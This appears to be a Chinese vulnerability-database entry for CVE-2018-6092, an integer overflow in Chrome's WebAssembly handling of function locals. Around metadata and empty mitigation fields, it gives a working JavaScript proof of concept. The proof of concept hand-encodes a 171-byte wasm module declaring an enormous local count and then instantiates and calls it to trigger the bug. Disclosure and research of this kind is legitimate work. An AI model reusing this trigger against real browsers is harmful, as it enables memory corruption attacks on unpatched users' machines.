Google Chrome: Integer Overflow when Processing WebAssembly Locals(CVE-2018-6092)

关注 0

基本字段

漏洞编号：: SSV-97339

披露/发现时间：: 2018-03-08

提交时间：: 2018-06-08

漏洞等级：

漏洞类别：: 整数溢出

影响组件：: Google Chrome

漏洞作者：: natashenka

提交者：: Knownsec

CVE-ID：: CVE-2018-6092

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

https://bugs.chromium.org/p/project-zero/issues/detail?id=1546

漏洞详情

贡献者共获得 0KB

共 0 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0KB

var b2 = new Uint8Array( 171); b2[0] = 0x0; b2[1] = 0x61; b2[2] = 0x73; b2[3] = 0x6d; b2[4] = 0x1; b2[5] = 0x0; b2[6] = 0x0; b2[7] = 0x0; b2[8] = 0x1; b2[9] = 0xe; b2[10] = 0x3; b2[11] = 0x60; b2[12] = 0x1; b2[13] = 0x7f; b2[14] = 0x0; b2[15] = 0x60; b2[16] = 0x0; b2[17] = 0x0; b2[18] = 0x60; b2[19] = 0x2; b2[20] = 0x7f; b2[21] = 0x7f; b2[22] = 0x1; b2[23] = 0x7f; b2[24] = 0x2; b2[25] = 0x23; b2[26] = 0x2; b2[27] = 0x2; b2[28] = 0x6a; b2[29] = 0x73; b2[30] = 0x3; b2[31] = 0x6d; b2[32] = 0x65; b2[33] = 0x6d; b2[34] = 0x2; b2[35] = 0x0; b2[36] = 0x1; b2[37] = 0x7; b2[38] = 0x69; b2[39] = 0x6d; b2[40] = 0x70; b2[41] = 0x6f; b2[42] = 0x72; b2[43] = 0x74; b2[44] = 0x73; b2[45] = 0xd; b2[46] = 0x69; b2[47] = 0x6d; b2[48] = 0x70; b2[49] = 0x6f; b2[50] = 0x72; b2[51] = 0x74; b2[52] = 0x65; b2[53] = 0x64; b2[54] = 0x5f; b2[55] = 0x66; b2[56] = 0x75; b2[57] = 0x6e; b2[58] = 0x63; b2[59] = 0x0; b2[60] = 0x0; b2[61] = 0x3; b2[62] = 0x3; b2[63] = 0x2; b2[64] = 0x1; b2[65] = 0x2; b2[66] = 0x7; b2[67] = 0x1e; b2[68] = 0x2; b2[69] = 0xd; b2[70] = 0x65; b2[71] = 0x78; b2[72] = 0x70; b2[73] = 0x6f; b2[74] = 0x72; b2[75] = 0x74; b2[76] = 0x65; b2[77] = 0x64; b2[78] = 0x5f; b2[79] = 0x66; b2[80] = 0x75; b2[81] = 0x6e; b2[82] = 0x63; b2[83] = 0x0; b2[84] = 0x1; b2[85] = 0xa; b2[86] = 0x61; b2[87] = 0x63; b2[88] = 0x63; b2[89] = 0x75; b2[90] = 0x6d; b2[91] = 0x75; b2[92] = 0x6c; b2[93] = 0x61; b2[94] = 0x74; b2[95] = 0x65; b2[96] = 0x0; b2[97] = 0x2; b2[98] = 0xa; b2[99] = 0x47; b2[100] = 0x2; b2[101] = 0x6; b2[102] = 0x0; b2[103] = 0x41; b2[104] = 0x2a; b2[105] = 0x10; b2[106] = 0x0; b2[107] = 0xb; b2[108] = 0x3e; b2[109] = 0x1; b2[110] = 0xff; b2[111] = 0xff; b2[112] = 0xff; b2[113] = 0xff; b2[114] = 0x0f; b2[115] = 0x7f; b2[116] = 0x20; b2[117] = 0x0; b2[118] = 0x20; b2[119] = 0x1; b2[120] = 0x41; b2[121] = 0x4; b2[122] = 0x6c; b2[123] = 0x6a; b2[124] = 0x21; b2[125] = 0x2; b2[126] = 0x2; b2[127] = 0x40; b2[128] = 0x3; b2[129] = 0x40; b2[130] = 0x20; b2[131] = 0x0; b2[132] = 0x20; b2[133] = 0x2; b2[134] = 0x46; b2[135] = 0xd; b2[136] = 0x1; b2[137] = 0x41; b2[138] = 0x2a; b2[139] = 0x10; b2[140] = 0x0; b2[141] = 0x20; b2[142] = 0x3; b2[143] = 0x41; b2[144] = 0xc4; b2[145] = 0x0; b2[146] = 0x20; b2[147] = 0x0; b2[148] = 0x36; b2[149] = 0x2; b2[150] = 0x0; b2[151] = 0x41; b2[152] = 0xc4; b2[153] = 0x0; b2[154] = 0x6a; b2[155] = 0x21; b2[156] = 0x3; b2[157] = 0x20; b2[158] = 0x0; b2[159] = 0x41; b2[160] = 0x4; b2[161] = 0x6a; b2[162] = 0x21; b2[163] = 0x0; b2[164] = 0xc; b2[165] = 0x0; b2[166] = 0xb; b2[167] = 0xb; b2[168] = 0x20; b2[169] = 0x3; b2[170] = 0xb; function f(){print("in f");} var memory = new WebAssembly.Memory({initial:1, maximum:1}); var mod = new WebAssembly.Module(b2); var i = new WebAssembly.Instance(mod, { imports : {imported_func : f}, js : {mem : memory}}); i.exports.accumulate.call(0, 5);

共 0 兑换

参考链接

https://bugs.chromium.org/p/project-zero/issues/detail?id=1546

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

暂无评论

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负